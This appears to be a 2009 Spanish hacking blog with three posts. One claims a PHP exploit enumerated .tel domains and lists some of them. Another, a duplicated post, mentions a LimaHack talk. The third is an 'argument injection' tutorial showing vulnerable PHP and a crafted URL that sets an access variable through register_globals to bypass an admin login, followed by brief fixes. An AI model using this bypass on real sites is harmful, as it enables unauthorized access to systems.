Bueno algunos de ustedes han de haber escuchado de estos dominios... la verdad pienso que son un poco inseguros por que con ayuda de unas lineas de code en PHP conseguí hacer un exploit para obtener la lista de todos los dominios que existen .tel estos dominios te vienen como con un pequeño hosting y pues puedes armas una página con themes desarrollados por ellos...

Aquí les dejo la lista de los dominios:

1-3goda.igrushki.tel 2009-05-10
1001-bijoux.tel 2009-04-24
12-18let.igrushki.tel 2009-04-24
12idn.ideegeo.tel 2009-04-29
13bank.tel 2009-04-03
13menu.tel 2009-04-03
1800tickets.tel 2009-04-03
1st.tel 2009-04-03
24-hour.alarmclock.tel 2009-05-10
2ai2.tel 2009-05-10
3ds.tel 2009-04-29
50cent.musicians.celebrity.tel 2009-04-15
5pointdesign.tel 2009-04-15
aaalockoutspecialist.tel 2009-04-29
aaargh.tel 2009-04-24
aalsmeer.netherlands.stage.tel 2009-05-10
aapl.tel 2009-04-24
abalorios.tel 2009-04-03
abandonware.tel 2009-04-15
abdullahgul.tel 2009-04-29
abidjan.africa.freetax.tel 2009-04-29
abkhazia.tel 2009-04-03
about.simonhelene.tel 2009-04-15
abr.tel 2009-04-03
abstractart.tel 2009-04-29
abteilungen.internetwire.tel 2009-04-24
accident.tel 2009-04-03
acciones.tel 2009-04-15
accordi.tel 2009-05-10
account.euroweb.tel 2009-05-10
accreditation-services.escapeartists.tel 2009-04-24
ace-consulting.tel 2009-04-24
acens.tel 2009-04-15
acorda.tel 2009-04-15
acsl-solicitors.accident.tel 2009-04-15
adamkillam.tel 2009-04-29
add-an-entry.promoting.tel 2009-05-10
address.yenaingsoe.tel 2009-04-24
addurl.tel 2009-04-15
adelaide.australia.oceania.travelagents.tel 2009-05-10
adele-gerdes.bielefeld.lektoren.tel 2009-05-10
adgrafics.tel 2009-04-24
adipopescu.tel 2009-04-15
administradoresdefincas.tel 2009-04-15
adobegold.tel 2009-05-10
adrian.tel 2009-04-03
ads-informatique.tel 2009-04-24
adult-dvd-explorer.dvds.pornos.tel 2009-04-24
advantage.wddx.tel 2009-04-24
adventor.tel 2009-04-29
advergaming.tel 2009-04-15
advertise.brighton.tel 2009-04-15
advice.investment.tel 2009-04-15
advisory.committees.noblenatl.tel 2009-05-10
advocates.tel 2009-04-03
adwordia.tel 2009-05-10
aeropuerto.tel 2009-05-10
aesthetics.tel 2009-04-15
affiliates.arthritis.pills.tel 2009-04-29
afghanistan.asia.cancel.tel 2009-05-10
africa.investment.tel 2009-04-15
africa.nestle.tel 2009-04-24
africa.other-offices.yourcompany.tel 2009-04-03
africa.travelagents.tel 2009-04-15
agadir.morocco.africa.other-offices.yourcompany.tel 2009-04-03
agashkina.logoped.tel 2009-05-10
agence-communication.tel 2009-04-24
agence-de-communication.tel 2009-04-24




Si quieren obtener la lista completa veanla en:

SendSpace
PasteBin


la web oficial de los dominios tel es:

http://www.telnic.org/


Saludos
Dr.White

viernes, 13 de noviembre de 2009

Mi Exposición de LimaHack

Sin mucho que decir... Aquí les va la expo...




Espero les haya gustado...


Saludos
Dr.White

Mi Exposición de LimaHack

Sin mucho que decir... Aquí les va la expo...




Espero les haya gustado...


Saludos
Dr.White

Argument Injection

Cuantas veces no hemos visto un log-in que no es vulnerable a sql injection pero queremos entrar a como de lugar, una idea sería brute-force pero... no siempre hay una respuesta...

Ahora les voy a mostrar un error que algunos programadores aun cometen, la idea es que cuando el usuario y la pass coninciden hacen que una variable X cambie a true, ahora la preguntasa es que pasaría si nosotros hicieramos que la variable a taves de un GET se ejecutara?


Un Ejemplo:



<?php
if ($access==true) {
echo 'Access Granted.'; }
else {
echo 'Access Denied.';
}
?>



Como ven en el caso de que access sea true te deja entrar... yo me pregunto que pasaría si nosotros por ejemplo...


http://www.bugged.com/admin/login.php

ahi ponemos un usuario para bypass con sql injection y no funciona entonces nos regresa a la misma página... pero nos mostrará algo como lo siguiente:


http://www.bugged.com/admin/login.php?user=&pass=

como ejemplo... ahora si nosotros en ves de esto pusieramos...

http://www.bugged.com/login.php?access=1

ahi tambiaríamos a true la variable access ahora como la mayoría de personas no ponen una seguridad a sus paneles de control solo faltaría ir a

http://www.bugged.com/admin/

y ver que estamos logueados como administradores... es algo muy raro como pueden pasar estas cosas pero como condicion para que funcione bien los register_blobals en ON, eso que dije es configuración del PHP.INI un archivo como el .htaccess que podremos ver despues...


Ahora para reparar este error no hay mucho que haces, básicamente primero que todo deberíamos de ponerle un htaccess a la carpeta ADMIN que solo permita que ingresemos desde sierta IP, con programación tambien podemos asegurarnos de que solo entren con un tipo de navegador...

Otra cosa deben de asegurar que pida la sessión en el momento de hacer que access cambie a 1...

if($_SESSION['access']

algo así es como se debería ver... mm bueno.. espero no cometan estos errores por que pueden causar mucha perdida de información.


Saludos
Dr.White